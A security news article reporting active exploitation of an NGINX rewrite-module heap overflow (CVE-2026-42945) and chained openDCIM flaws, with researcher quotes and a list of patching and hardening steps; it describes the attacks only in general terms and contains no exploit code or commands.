A newly disclosed security vulnerability affecting both NGINX Plus and NGINX Open Source is already being actively exploited in the wild, according to cybersecurity researchers at VulnCheck.

The flaw, tracked as CVE-2026-42945, carries a critical CVSS score of 9.2 and impacts NGINX versions 0.6.27 through 1.30.0. Security experts say the vulnerability stems from a heap buffer overflow in the ngx_http_rewrite_module, a weakness reportedly introduced as far back as 2008.

What Makes CVE-2026-42945 Dangerous?

Successful exploitation could allow an unauthenticated attacker to crash NGINX worker processes or potentially achieve remote code execution (RCE) using specially crafted HTTP requests.

However, researchers note that full remote code execution is only feasible when Address Space Layout Randomization (ASLR) is disabled — a security mechanism designed to make memory-based attacks more difficult.

Security researcher Kevin Beaumont explained that exploitation depends heavily on the target system’s configuration.

“It relies on a specific NGINX config to be vulnerable, and for an attacker to know or discover the config to exploit it. To reach RCE, ASLR also needs to have been disabled on the box.”

Researchers from AlmaLinux echoed similar concerns, stating that while reliable code execution may be difficult on systems with ASLR enabled, denial-of-service (DoS) attacks through worker process crashes remain highly practical.

The maintainers warned:

“Not easy does not mean impossible. The worker-crash DoS is exploitable enough on its own that we recommend treating this as urgent.”

Exploitation Attempts Already Detected

According to VulnCheck, attackers have already begun weaponizing the flaw. The company observed exploitation attempts targeting its honeypot infrastructure shortly after public disclosure of the vulnerability.

At this stage, researchers have not determined the attackers’ exact objectives or whether successful compromises have occurred in real-world environments.

Organizations running vulnerable NGINX deployments are strongly advised to apply the latest patches released by F5 immediately.

---

Critical openDCIM Vulnerabilities Also Under Attack

In a separate advisory, VulnCheck also revealed active exploitation attempts targeting multiple critical vulnerabilities in openDCIM, an open-source platform used for managing data center infrastructure.

Two of the flaws carry CVSS scores of 9.3:

CVE-2026-28515 – Missing Authorization Vulnerability

This vulnerability allows authenticated users to access LDAP configuration functionality regardless of assigned permissions.

Researchers warned that in Docker deployments where REMOTE_USER is configured without proper authentication enforcement, attackers may gain unauthorized access without credentials, potentially enabling malicious configuration changes.

CVE-2026-28517 – Operating System Command Injection

The second flaw affects the report_network_map.php component, which improperly processes a parameter named dot.

Because the parameter is passed directly to a shell command without sanitization, attackers can exploit the flaw to execute arbitrary operating system commands remotely.

Vulnerability Chaining Enables Remote Shell Access

The vulnerabilities were discovered alongside another critical flaw, CVE-2026-28516, by VulnCheck researcher Valentin Lobstein earlier this year.

According to Lobstein, attackers can chain the three vulnerabilities together to achieve full remote code execution in as few as five HTTP requests, ultimately deploying a reverse shell on vulnerable systems.

Researchers Link Activity to Chinese IP Address

Caitlin Condon said the observed attack activity currently appears to originate from a single Chinese IP address.

Researchers also believe the attackers are using a customized version of the AI-powered vulnerability discovery tool Vulnhuntr to identify vulnerable systems automatically before deploying a PHP web shell.

Recommended Actions for Organizations

Security teams are encouraged to take the following steps immediately:

• Update NGINX and openDCIM installations to the latest patched versions
• Verify that ASLR remains enabled on Linux systems
• Review NGINX rewrite module configurations for unnecessary exposure
• Restrict public access to administrative interfaces
• Monitor logs for suspicious HTTP requests and unexpected shell activity
• Audit Docker deployments for insecure REMOTE_USER configurations

With exploitation already underway, organizations should treat these vulnerabilities as high-priority threats requiring immediate remediation.